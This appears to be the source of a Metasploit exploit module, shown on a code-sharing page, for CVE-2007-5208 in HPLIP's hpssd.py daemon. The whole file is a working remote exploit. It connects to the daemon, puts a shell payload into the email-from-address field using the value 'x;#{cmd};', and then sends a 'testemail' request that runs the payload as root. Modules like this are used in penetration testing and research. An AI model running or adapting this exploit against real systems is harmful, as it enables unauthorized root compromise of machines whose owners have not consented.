Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'HPLIP hpssd.py From Address Arbitrary Command Execution',
14
      'Description'    => %q{
15
          This module exploits a command execution vulnerable in the hpssd.py
16
        daemon of the Hewlett-Packard Linux Imaging and Printing Project.
17
        According to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable.
18

19
        This module was written and tested using the Fedora 6 Linux distribution.
20
        On the test system, the daemon listens on localhost only and runs with
21
        root privileges. Although the configuration shows the daemon is to
22
        listen on port 2207, it actually listens on a dynamic port.
23

24
        NOTE: If the target system does not have a 'sendmail' command installed,
25
        this vulnerability cannot be exploited.
26
      },
27
      'Author'         => [ 'jduck' ],
28
      'License'        => MSF_LICENSE,
29
      'References'     =>
30
        [
31
          [ 'CVE', '2007-5208' ],
32
          [ 'OSVDB', '41693' ],
33
          [ 'BID', '26054' ],
34
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=319921' ],
35
          [ 'URL', 'https://bugzilla.redhat.com/attachment.cgi?id=217201&action=edit' ]
36
        ],
37
      'Platform'       => ['unix'],
38
      'Arch'           => ARCH_CMD,
39
      'Privileged'     => true,
40
      'Payload'        =>
41
        {
42
          'Space'       => 1024,
43
          'DisableNops' => true,
44
          'Compat'      =>
45
            {
46
              'PayloadType' => 'cmd',
47
              # *_perl and *_ruby work if they are installed
48
              # inetd isn't used on FC6/7 (xinetd is)
49
              # netcat doesn't have -e by default
50
            }
51
        },
52
      'Targets'        =>
53
        [
54
          [ 'Automatic (hplip-1.6.7-4.i386.rpm)', { } ]
55
        ],
56
      'DefaultTarget' => 0,
57
      'DisclosureDate'  => '2007-10-04'
58
    ))
59

60
    register_options(
61
      [
62
        Opt::RPORT(2207),
63
      ])
64
  end
65

66
  def exploit
67

68
    connect
69

70
    #cmd = "nohup " + payload.encoded
71
    cmd = payload.encoded
72

73
    username = 'root'
74
    toaddr = 'nosuchuser'
75

76
    # first setalerts
77
    print_status("Sending 'setalerts' request with encoded command line...")
78
    msg = "username=#{username}\n" +
79
      "email-alerts=1\n" +
80
      #"email-from-address=`#{cmd}`\n" +
81
      "email-from-address=x;#{cmd};\n" +
82
      "email-to-addresses=#{toaddr}\n" +
83
      "msg=setalerts\n"
84
    sock.put(msg)
85

86
    # next, the test email command
87
    print_status("Sending 'testemail' request to trigger execution...")
88
    msg = "msg=testemail\n"
89
    sock.put(msg)
90

91
  end
92
end
93

94